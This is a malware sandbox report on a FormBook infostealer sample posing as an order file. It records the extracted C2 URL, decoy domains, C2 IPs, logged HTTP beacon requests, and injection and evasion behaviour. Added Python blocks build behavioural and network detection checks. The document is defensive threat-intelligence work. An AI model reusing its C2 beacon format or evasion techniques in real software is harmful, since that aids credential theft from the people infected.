Windows Analysis Report Order No00020212910.exe

Overview

General Information

Sample Name: Order No00020212910.exe
Analysis ID: 511399
MD5: d25773010f5aed66b9b5f79b81983593
SHA1: 71dc0f0edb6940bc05dd9e7ee27f1e248c789c3d
SHA256: 41de1c603509906c3ddcb2550617c980ba3dd192048a52b449e3894d94e1bad5
Tags: exe, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
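The signature list above records the behaviours of this chain (explorer.exe spawning NETSTAT.EXE, a system process connecting out, the sample starting a copy of itself, self-deletion via cmd) but not how they look in endpoint telemetry. As an added example that is not part of the Joe Sandbox report, the following Python runs four such checks over constructed Sysmon-style process-create and network-connect events. The images, the explorer.exe to NETSTAT.EXE spawn and the port-80 destinations are the ones the report lists; the PIDs, the benign rows and the exact cmd.exe command line are assumptions made for illustration.

```python
"""Behavioural checks for the process chain in this report, run over constructed
Sysmon-style events: explorer.exe spawning NETSTAT.EXE, system processes talking
HTTP, the dropper spawning a copy of itself, and cmd.exe deleting the dropper."""
import re
from typing import Dict, List

EXPLORER = r"C:\Windows\explorer.exe"
DROPPER = r"C:\Users\user\Desktop\Order No00020212910.exe"
NETSTAT = r"C:\Windows\SysWOW64\NETSTAT.EXE"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

# Constructed events (eid 1 = process create, eid 3 = network connect). Images,
# the explorer.exe -> NETSTAT.EXE spawn and the port-80 destinations come from
# the report; PIDs, the cmd.exe command line and the benign rows are assumptions.
EVENTS: List[Dict[str, object]] = [
    {"eid": 1, "pid": 3300, "ppid": 1200, "image": EXPLORER, "cmdline": EXPLORER},
    {"eid": 1, "pid": 4012, "ppid": 3300, "image": DROPPER, "cmdline": f'"{DROPPER}"'},
    {"eid": 1, "pid": 4100, "ppid": 4012, "image": DROPPER, "cmdline": f'"{DROPPER}"'},
    {"eid": 1, "pid": 4220, "ppid": 3300, "image": NETSTAT, "cmdline": NETSTAT},
    {"eid": 1, "pid": 5000, "ppid": 3300, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\user\notes.txt"},
    {"eid": 3, "pid": 3300, "image": EXPLORER, "dst_ip": "34.98.99.30", "dst_port": 80},
    {"eid": 3, "pid": 4220, "image": NETSTAT, "dst_ip": "74.220.199.6", "dst_port": 80},
    {"eid": 3, "pid": 5200, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
    {"eid": 1, "pid": 4300, "ppid": 4220, "image": CMD, "cmdline": f'cmd.exe /c del "{DROPPER}"'},
]

SYSWOW64 = "c:\\windows\\syswow64\\"
USER_PATHS = ("c:\\users\\", "c:\\programdata\\")  # locations an unprivileged user can write to


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _hit(rule: str, ev: Dict[str, object], detail: str) -> Dict[str, object]:
    return {"rule": rule, "pid": ev["pid"], "image": ev["image"], "detail": detail}


def run_checks(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    creates = [ev for ev in events if ev["eid"] == 1]
    image_of = {ev["pid"]: str(ev["image"]) for ev in creates}
    executed = {str(ev["image"]).lower() for ev in creates}
    hits: List[Dict[str, object]] = []
    for ev in creates:
        image, cmd = str(ev["image"]), str(ev["cmdline"])
        parent = image_of.get(ev["ppid"], "")
        # 1. The shell launching a 32-bit system utility with no arguments at all:
        #    the injected explorer.exe starts NETSTAT.EXE exactly this way.
        if (basename(parent) == "explorer.exe" and image.lower().startswith(SYSWOW64)
                and cmd.strip('"').lower() == image.lower()):
            hits.append(_hit("shell_spawns_bare_syswow64", ev, f"parent={parent}"))
        # 2. A binary in a user-writable location starting a copy of itself: the
        #    process-creation side of "creates a process in suspended mode" / hollowing.
        if parent.lower() == image.lower() and image.lower().startswith(USER_PATHS):
            hits.append(_hit("self_spawn_from_user_path", ev, f"parent pid={ev['ppid']}"))
        # 3. cmd.exe deleting an executable that ran earlier in the same trace.
        m = re.search(r'\bdel\b\s+"?([^"]+?\.exe)"?', cmd, re.IGNORECASE)
        if basename(image) == "cmd.exe" and m and m.group(1).lower() in executed:
            hits.append(_hit("cmd_deletes_executed_binary", ev, m.group(1)))
    for ev in events:
        # 4. Outbound connections from explorer.exe or a SysWOW64 system binary;
        #    tune the image list where explorer.exe legitimately talks HTTP.
        if ev["eid"] == 3:
            image = str(ev["image"]).lower()
            if basename(image) == "explorer.exe" or image.startswith(SYSWOW64):
                hits.append(_hit("system_process_network", ev, f"{ev['dst_ip']}:{ev['dst_port']}"))
    return hits


if __name__ == "__main__":
    for h in run_checks(EVENTS):
        print(f"{h['rule']:30} pid={h['pid']:<6} {h['image']}  {h['detail']}")
```

Run on the constructed events the checks fire on NETSTAT.EXE (rules 1 and 4), on explorer.exe (rule 4), on the second Order No00020212910.exe instance (rule 2) and on the cmd.exe deletion (rule 3), and stay silent on the notepad.exe and firefox.exe rows.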

AV Detection:

Found malware configuration
Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lasnochesdeluces.com/ng6c/"], "decoy": ["ayeghkarialmahdi.com", "xpatfone.com", "doctorsilkroad.com", "ivegotthat.com", "letsguthappy.com", "xrxgqf.website", "northlakelogisticspark.com", "iseewhatyourmean.space", "animalsmeme.net", "webuywholesalerhouses.com", "946abp.net", "fitnsfreak.com", "beautyloungeacademyllc.com", "chuyistudio.com", "koiclean.com", "oneupcobra.net", "cleversights.com", "viniciusshop.com", "roonkingagency.online", "pentooloffice.com", "dapaotang0.xyz", "dress-ads.com", "malgorzata-lac.com", "shoppingvipshopping.space", "mar.cruises", "motivational-hub.com", "4217193.win", "collegedalerealtor.com", "keylinktosolutions.com", "longlivesela.com", "xso94.top", "lalocandaonline.com", "thebootyteasisterhood.com", "varzeshbanovans.com", "resonators-and.com", "geodigraph.coop", "retrosvoiture.com", "qiuma.net", "caringhearts.asia", "mgav99.xyz", "daliborkokic.com", "wtfong.com", "caprockiic.com", "pgonline555.online", "baxin.net", "ezo-magik.store", "renewueye.com", "deepideaconsulting.com", "timmyben.com", "pavitrafabtech.com", "ohsodolc.com", "lemesdev.com", "senseyestore.com", "multivisaorepresentacao.com", "ferasan.com", "wholenessdiagram.com", "smelltraining.club", "lifestylearch.com", "harryrowlandart.com", "bigceme3.com", "rittmarshausen.net", "day-mutual.com", "inkedbreadco.com", "craftycatmull.com"]}
Multi AV Scanner detection for submitted file
Source: Order No00020212910.exe VirusTotal: Detection: 24%
Yara detected FormBook
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: Order No00020212910.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.Order No00020212910.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Order No00020212910.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Order No00020212910.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.Order No00020212910.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Order No00020212910.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Order No00020212910.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Debug symbol paths found in memory: the netstat.pdb and wntdll.pdb strings appear inside the hollowed Order No00020212910.exe process (process 5) as well as in NETSTAT.EXE, which fits a payload that maps netstat.exe and a second copy of ntdll.dll into its own address space rather than relying only on the system-loaded images.
Source: Binary string: netstat.pdbGCTL source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp
Source: Binary string: netstat.pdb source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: Order No00020212910.exe, 00000005.00000002.359186565.0000000000F70000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000E.00000002.541418098.00000000038EF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Order No00020212910.exe, NETSTAT.EXE

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 4x nop then pop esi 5_2_00415821
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 4x nop then pop edi 5_2_004162F0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 4x nop then pop edi 5_2_00415686
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop esi 14_2_00B25821
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 14_2_00B262F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 14_2_00B25686
The three NETSTAT.EXE hits are the same three functions at the same image offsets (0x15821, 0x162F0, 0x15686), rebased from 0x00400000 in the hollowed Order No00020212910.exe process to 0x00B10000 in NETSTAT.EXE; 0x00B10000 is also the NETSTAT.EXE memory region that matches the FormBook Yara rules above, i.e. the payload was copied into netstat as the process-hollowing and thread-injection signatures describe.

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49815 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49815 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49815 -> 34.98.99.30:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 74.220.219.155:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 74.220.219.155:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 74.220.219.155:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.beautyloungeacademyllc.com
Source: C:\Windows\explorer.exe Domain query: www.collegedalerealtor.com
Source: C:\Windows\explorer.exe Domain query: www.inkedbreadco.com
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe Network Connect: 74.220.199.6 80
Source: C:\Windows\explorer.exe Network Connect: 44.227.76.166 80
Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80
Source: C:\Windows\explorer.exe Domain query: www.xpatfone.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.xrxgqf.website
Source: C:\Windows\explorer.exe Domain query: www.shoppingvipshopping.space
Source: C:\Windows\explorer.exe Domain query: www.lasnochesdeluces.com
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lasnochesdeluces.com/ng6c/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: AMAZON-02US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ng6c/?n87xKt=eTNPRcwwgHJu+ztik5FR6WEVQXMPsMKKvKIaNBiNk9xxGwn0sgQR4Omx9AGkAwkJPdqZ&3fs8=7nB4LhYH HTTP/1.1 | Host: www.inkedbreadco.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ng6c/?n87xKt=QK0eY45OxUyc4Ytk5lUqhd7fpJYow4bz7iPp6Y4xtBWfe/8BFN1G/o4M7OI98LSuiB2U&3fs8=7nB4LhYH HTTP/1.1 | Host: www.xrxgqf.website | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ng6c/?n87xKt=BIGY07QLXhzrGEPrN5TMQ+GQMkNh6T9moM8B1IFcGHmMBIb3S5gzA33xEH70m79GvSww&3fs8=7nB4LhYH HTTP/1.1 | Host: www.xpatfone.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ng6c/?n87xKt=x9dHvUGvpchYPBT7VwuO56uIXLHJpDRZByO6Leav9okJR9tMfFR62Q+ZLp4qF5rGLwf5&3fs8=7nB4LhYH HTTP/1.1 | Host: www.collegedalerealtor.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /ng6c/?n87xKt=ejUrfSiI2rbA4rKmHAIV6gBQeeD+hJ/4mMGWNn0SrfgkLPq4Q2wY4xAxq5Ra/NRyIx4H&3fs8=7nB4LhYH HTTP/1.1 | Host: www.lasnochesdeluces.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
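Parsing the five requests above and checking each Host header against the extracted configuration shows why the report lists six contacted domains but one C2: four of the five requests go to decoy domains from the configuration and only www.lasnochesdeluces.com is the real C2, while every request has the same shape (no User-Agent, Connection: close, a short path, one long base64-like parameter and one short one). The following Python is an added example and is not part of the Joe Sandbox report: the request bytes are reconstructed from the flattened lines above, the decoy list is the subset needed for these hosts, and the check-in-shape regexes are a heuristic derived from these five requests, not the logic of the ET Snort rules that fired.

```python
"""Triage the HTTP check-ins above against the extracted FormBook configuration."""
import re
from typing import Dict, List, Tuple

# Fields copied from the report's "Found malware configuration" entry. The decoy
# list is the subset needed for the five observed hosts; the report has the full list.
CONFIG: Dict[str, List[str]] = {
    "C2 list": ["www.lasnochesdeluces.com/ng6c/"],
    "decoy": [
        "xpatfone.com", "xrxgqf.website", "collegedalerealtor.com",
        "inkedbreadco.com", "beautyloungeacademyllc.com", "shoppingvipshopping.space",
    ],
}


def _request(target: str, host: str) -> str:
    """Rebuild one request as the report shows it: no User-Agent header,
    Connection: close and a seven-byte all-zero body (constructed here)."""
    return (f"GET {target} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
            + "\x00" * 7)


# The five requests from the "HTTP GET or POST without a user agent" entries.
OBSERVED = [
    _request("/ng6c/?n87xKt=eTNPRcwwgHJu+ztik5FR6WEVQXMPsMKKvKIaNBiNk9xxGwn0sgQR4Omx9AGkAwkJPdqZ&3fs8=7nB4LhYH", "www.inkedbreadco.com"),
    _request("/ng6c/?n87xKt=QK0eY45OxUyc4Ytk5lUqhd7fpJYow4bz7iPp6Y4xtBWfe/8BFN1G/o4M7OI98LSuiB2U&3fs8=7nB4LhYH", "www.xrxgqf.website"),
    _request("/ng6c/?n87xKt=BIGY07QLXhzrGEPrN5TMQ+GQMkNh6T9moM8B1IFcGHmMBIb3S5gzA33xEH70m79GvSww&3fs8=7nB4LhYH", "www.xpatfone.com"),
    _request("/ng6c/?n87xKt=x9dHvUGvpchYPBT7VwuO56uIXLHJpDRZByO6Leav9okJR9tMfFR62Q+ZLp4qF5rGLwf5&3fs8=7nB4LhYH", "www.collegedalerealtor.com"),
    _request("/ng6c/?n87xKt=ejUrfSiI2rbA4rKmHAIV6gBQeeD+hJ/4mMGWNn0SrfgkLPq4Q2wY4xAxq5Ra/NRyIx4H&3fs8=7nB4LhYH", "www.lasnochesdeluces.com"),
]


def parse_request(raw: str) -> Dict[str, object]:
    """Minimal HTTP/1.1 request parser: request line, headers (lower-cased names),
    raw (undecoded) query parameters in order, and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = [tuple(p.partition("=")[::2]) for p in query.split("&") if p]
    return {"method": method, "path": path, "params": params,
            "headers": headers, "body": body}


def normalize_host(host: str) -> str:
    """Lower-case, drop any port and a leading 'www.' (the configuration stores
    decoys without it, the requests add it)."""
    host = host.strip().lower().split(":")[0]
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str, config: Dict[str, List[str]] = CONFIG) -> str:
    """'c2' for the configured C2 host, 'decoy' for a configured decoy, else 'unknown'."""
    c2_hosts = {normalize_host(u.split("/", 1)[0]) for u in config["C2 list"]}
    decoys = {normalize_host(d) for d in config["decoy"]}
    h = normalize_host(host)
    if h in c2_hosts:
        return "c2"
    if h in decoys:
        return "decoy"
    return "unknown"


# Heuristic shape of the check-ins seen here (an assumption derived from the five
# requests above, not the content of the ET Snort rules): GET /<short token>/
# ?<key>=<long base64-like blob>&<key>=<short token>, no User-Agent, Connection: close.
CHECKIN_PATH = re.compile(r"^/[a-z0-9]{3,8}/$")
BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
TOKEN = re.compile(r"^[A-Za-z0-9]{2,10}$")


def looks_like_checkin(req: Dict[str, object]) -> bool:
    params = req["params"]
    headers = req["headers"]
    return bool(
        req["method"] == "GET"
        and CHECKIN_PATH.match(req["path"])
        and len(params) == 2
        and TOKEN.match(params[0][0]) and BLOB.match(params[0][1])
        and TOKEN.match(params[1][0]) and TOKEN.match(params[1][1])
        and "user-agent" not in headers
        and headers.get("connection", "").lower() == "close"
    )


def triage(raw_requests: List[str], config: Dict[str, List[str]] = CONFIG) -> List[Tuple[str, str, bool]]:
    """(host, classification, matches check-in shape) for each request."""
    rows = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        rows.append((host, classify_host(host, config), looks_like_checkin(req)))
    return rows


def real_c2_hosts(rows: List[Tuple[str, str, bool]]) -> List[str]:
    """Hosts worth blocking as C2; the decoys are unrelated third-party sites."""
    return [host for host, kind, _ in rows if kind == "c2"]


if __name__ == "__main__":
    rows = triage(OBSERVED)
    for host, kind, checkin in rows:
        print(f"{host:30} {kind:8} checkin_shape={checkin}")
    print("real C2:", real_c2_hosts(rows))
```

The practical point of separating the two classes: the decoy traffic is real HTTP to legitimate sites, so blocking every domain in the report would cut off unrelated services, while the extracted configuration pins the one host (and the /ng6c/ path) that matters; the shape check is what lets the same request pattern be spotted when the configuration is not available.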
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.185.159.144
Source: Joe Sandbox View IP Address: 74.220.199.6
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Fri, 29 Oct 2021 02:24:27 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61704eb2-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Fri, 29 Oct 2021 02:24:32 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6169a6e7-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: NETSTAT.EXE, 0000000E.00000002.542198796.0000000003E82000.00000004.00020000.sdmp String found in binary or memory: http://collegedalerealtor.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Order No00020212910.exe, 00000000.00000002.292344503.0000000007AC0000.00000004.00020000.sdmp String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Order No00020212910.exe, 00000000.00000002.291611967.0000000006CF2000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown DNS traffic detected: queries for: www.inkedbreadco.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: Order No00020212910.exe, 00000000.00000002.290003592.0000000001048000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook (same unpacked-PE and memory matches as listed under AV Detection above)

System Summary:

Malicious sample detected (through community Yara rule)
Source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
